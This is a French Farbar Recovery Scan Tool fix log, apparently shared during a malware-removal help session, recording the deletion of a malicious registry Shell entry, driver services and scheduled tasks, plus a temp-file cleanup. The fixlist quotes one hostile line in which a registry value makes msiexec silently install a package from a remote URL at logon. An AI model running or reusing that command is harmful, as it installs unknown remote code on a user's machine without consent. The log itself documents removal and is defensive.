cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 16-04-2017
Exécuté par Steven (16-04-2017 16:59:13) Run:1
Exécuté depuis C:\Users\Steven\Desktop
Profils chargés: Steven (Profils disponibles: Steven & Administrateur)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-309874020-4284787689-2479007716-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMWJLNUJLMjIdMUE2FkU4OWE8MWQQNjIxOYNSNTH3MF== /q
S3 catchme; \??\C:\Users\Steven\AppData\Local\Temp\catchmedhlp.sys [X]
S3 dbx; system32\DRIVERS\dbx.sys [X]
Task: {0A81B4F3-EC8E-4E4C-8A4A-AAF1FAE24F63} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\RunCampaignManager2 => C:\Windows\system32\UNP\UNPCampaignManager.exe [2017-04-02] (Microsoft Corporation)
Task: {0E1AC438-6D6D-4A69-96C4-7290A692D331} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OnIdle => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation)
Task: {4FF0B44E-D4C8-41A4-9E0C-1BA770C44FB2} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Logon => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation)
Task: {8CB51E35-574D-4392-87FF-F16C722F78F0} - \WPD\SqmUpload_S-1-5-21-309874020-4284787689-2479007716-1001 -> Pas de fichier
Task: {93ABE1E0-42B2-4BD0-A83B-231F2CA18D18} - System32\Tasks\Microsoft\Windows\UNP\RunCampaignManager => C:\WINDOWS\System32\UNP\UNPCampaignManager.exe [2017-04-02] (Microsoft Corporation)
Task: {AD48B3FA-5089-459F-B83B-261DAA1E5416} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Time => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation)
Task: {D0D64610-AC70-4804-9E8C-7C8CC81D6368} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Unlock => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation)
Task: {D586E128-4DFD-4093-BC27-82B626E9CF7F} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OutOfIdle => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation)
EmptyTemp:
end
*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-309874020-4284787689-2479007716-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\catchme => clé supprimé(es) avec succès
catchme => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\dbx => clé supprimé(es) avec succès
dbx => service supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0A81B4F3-EC8E-4E4C-8A4A-AAF1FAE24F63} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A81B4F3-EC8E-4E4C-8A4A-AAF1FAE24F63} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\RunCampaignManager2 => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\RunCampaignManager2 => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0E1AC438-6D6D-4A69-96C4-7290A692D331} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0E1AC438-6D6D-4A69-96C4-7290A692D331} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OnIdle => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OnIdle => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4FF0B44E-D4C8-41A4-9E0C-1BA770C44FB2} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4FF0B44E-D4C8-41A4-9E0C-1BA770C44FB2} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Logon => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Logon => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8CB51E35-574D-4392-87FF-F16C722F78F0} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8CB51E35-574D-4392-87FF-F16C722F78F0} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD\SqmUpload_S-1-5-21-309874020-4284787689-2479007716-1001 => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{93ABE1E0-42B2-4BD0-A83B-231F2CA18D18} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93ABE1E0-42B2-4BD0-A83B-231F2CA18D18} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\RunCampaignManager => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AD48B3FA-5089-459F-B83B-261DAA1E5416} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AD48B3FA-5089-459F-B83B-261DAA1E5416} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Time => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Time => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D0D64610-AC70-4804-9E8C-7C8CC81D6368} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D0D64610-AC70-4804-9E8C-7C8CC81D6368} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Unlock => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Unlock => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D586E128-4DFD-4093-BC27-82B626E9CF7F} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D586E128-4DFD-4093-BC27-82B626E9CF7F} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OutOfIdle => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OutOfIdle => clé supprimé(es) avec succès

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 53402937 B
Java, Flash, Steam htmlcache => 136231414 B
Windows/system/drivers => 59551300 B
Edge => 3032202 B
Chrome => 547887996 B
Firefox => 12216012 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 211 B
systemprofile32 => 0 B
LocalService => 13250 B
NetworkService => 5975530 B
Steven => 17238552 B
Administrateur => 0 B

RecycleBin => 0 B
EmptyTemp: => 796.8 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 17:00:03 ====

Publicité


Signaler le contenu de ce document

Publicité